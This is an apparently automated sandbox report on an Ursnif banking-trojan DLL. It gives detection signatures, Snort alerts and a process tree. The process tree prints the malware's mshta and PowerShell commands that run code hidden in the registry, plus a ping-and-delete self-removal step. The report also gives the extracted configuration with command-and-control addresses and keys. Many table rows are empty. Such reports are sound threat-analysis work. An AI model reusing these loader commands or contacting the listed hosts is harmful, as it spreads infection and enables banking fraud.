Edit tour
Windows
Analysis Report
pDut.azdgC
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Windows Shell File Write to Suspicious Folder
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Sigma detected: Suspicious Remote Thread Created
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll32.exe (PID: 2760 cmdline:
loaddll32. exe "C:\Us ers\user\D esktop\pDu t.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938) - cmd.exe (PID: 3632 cmdline:
cmd.exe /C rundll32. exe "C:\Us ers\user\D esktop\pDu t.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D) - rundll32.exe (PID: 344 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\pDut .dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D) - control.exe (PID: 720 cmdline:
C:\Windows \system32\ control.ex e -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F) - explorer.exe (PID: 3968 cmdline:
C:\Windows \Explorer. EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D) - cmd.exe (PID: 5996 cmdline:
C:\Windows \System32\ cmd.exe" / C ping loc alhost -n 5 && del " C:\Users\u ser\Deskto p\pDut.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 4556 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - PING.EXE (PID: 5324 cmdline:
ping local host -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B) - RuntimeBroker.exe (PID: 4168 cmdline:
C:\Windows \System32\ RuntimeBro ker.exe -E mbedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5) - WerFault.exe (PID: 5464 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 2 760 -s 304 MD5: 9E2B8ACAD48ECCA55C0230D63623661B) - WerFault.exe (PID: 6448 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 2 760 -s 260 MD5: 9E2B8ACAD48ECCA55C0230D63623661B) - WerFault.exe (PID: 6868 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 2 760 -s 268 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
- mshta.exe (PID: 3920 cmdline:
C:\Windows \System32\ mshta.exe" "about:<h ta:applica tion><scri pt>Wefk='w script.she ll';resize To(0,2);ev al(new Act iveXObject (Wefk).reg read('HKCU \\\Softwar e\\AppData Low\\Softw are\\Micro soft\\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E\\\TestL ocal'));if (!window.f lag)close( )</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB) - powershell.exe (PID: 6736 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" new-alias -name iqio aqncxw -va lue gp; ne w-alias -n ame fchfny -value ie x; fchfny ([System.T ext.Encodi ng]::ASCII .GetString ((iqioaqnc xw "HKCU:S oftware\Ap pDataLow\S oftware\Mi crosoft\54 E80703-A33 7-A6B8-CDC 8-873A517C AB0E").Url sReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 6744 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - csc.exe (PID: 6580 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\cweuuam v.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 2080 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES3B19.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\CSC 9452DD6E90 C74A5284F4 5229D37BC. TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - csc.exe (PID: 6020 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\41kkxng 4.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 6088 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES52D7.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\CSC E5529B6452 BD443991E7 FB86A88433 C.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- cmd.exe (PID: 2396 cmdline:
C:\Windows \system32\ cmd.exe /c wevtutil qe "applic ation" /c: 100 /rd:fa lse MD5: F3BDBE3BB6F734E357235F4D5898582D)
- cleanup
{"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
Click to see the 21 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Click to see the 2 entries |
System Summary |
---|
Source: | Author: Florian Roth: |
Source: | Author: Nikita Nazarov, oscd.community: |
Source: | Author: Perez Diego (@darkquassar), oscd.community: |
Source: | Author: Michael Haag: |
Source: | Author: Florian Roth: |
Source: | Author: Florian Roth: |
Source: | Author: Florian Roth: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: frack113: |
Timestamp: | 04/22/22-15:33:01.649952 04/22/22-15:33:01.649952 |
SID: | 2033204 |
Source Port: | 49746 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/22/22-15:32:39.565574 04/22/22-15:32:39.565574 |
SID: | 2033203 |
Source Port: | 49728 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/22/22-15:32:59.896476 04/22/22-15:32:59.896476 |
SID: | 2033203 |
Source Port: | 49746 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/22/22-15:33:00.692984 04/22/22-15:33:00.692984 |
SID: | 2033203 |
Source Port: | 49746 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 3_2_05243072 |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | Network Connect: | Jump to behavior |
Source: | Process created: |
Source: | ASN Name: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Code function: | 3_2_05244CC6 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Registry key value created / modified: |
Source: | Code function: | 3_2_05243072 |
System Summary |
---|
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: |
Source: | Static PE information: |
Source: | Process created: |
Source: | Code function: | 3_2_0524475F | |
Source: | Code function: | 3_2_0524198A | |
Source: | Code function: | 3_2_0524821C |
Source: | Code function: | 3_2_052425D7 | |
Source: | Code function: | 3_2_05244695 | |
Source: | Code function: | 3_2_05243A9C | |
Source: | Code function: | 3_2_05248441 |
Source: | Binary or memory string: |
Source: | Key opened: | Jump to behavior |
Source: | Section loaded: | Jump to behavior |
Source: | ReversingLabs: |
Source: | Static PE information: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: |
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: |
Source: | Code function: | 3_2_05246DB6 |
Source: | Process created: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 3_2_05247E29 | |
Source: | Code function: | 3_2_0524821B | |
Source: | Code function: | 3_2_0524B301 |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Process created: | ||
Source: | Process created: |
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: |
Malware Analysis System Evasion |
---|
Source: | Process created: | ||
Source: | Process created: |
Source: | Thread sleep time: | Jump to behavior |
Source: | Evasive API call chain: |
Source: | Last function: | ||
Source: | Last function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Check user administrative privileges: |
Source: | Process information queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process queried: | Jump to behavior | ||
Source: | Process queried: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | |||
Source: | Memory written: | |||
Source: | Memory written: | |||
Source: | Memory written: |
Source: | Memory protected: | ||
Source: | Memory protected: | ||
Source: | Memory protected: | ||
Source: | Memory protected: |
Source: | Memory allocated: |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | |||
Source: | Memory written: | |||
Source: | Memory written: |
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: |
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: | |||
Source: | Thread created: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | |||
Source: | Process created: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 3_2_052412D3 |
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 3_2_052439B5 |
Source: | Code function: | 3_2_0524515F |
Source: | Code function: | 3_2_052412D3 |
Stealing of Sensitive Information |
---|
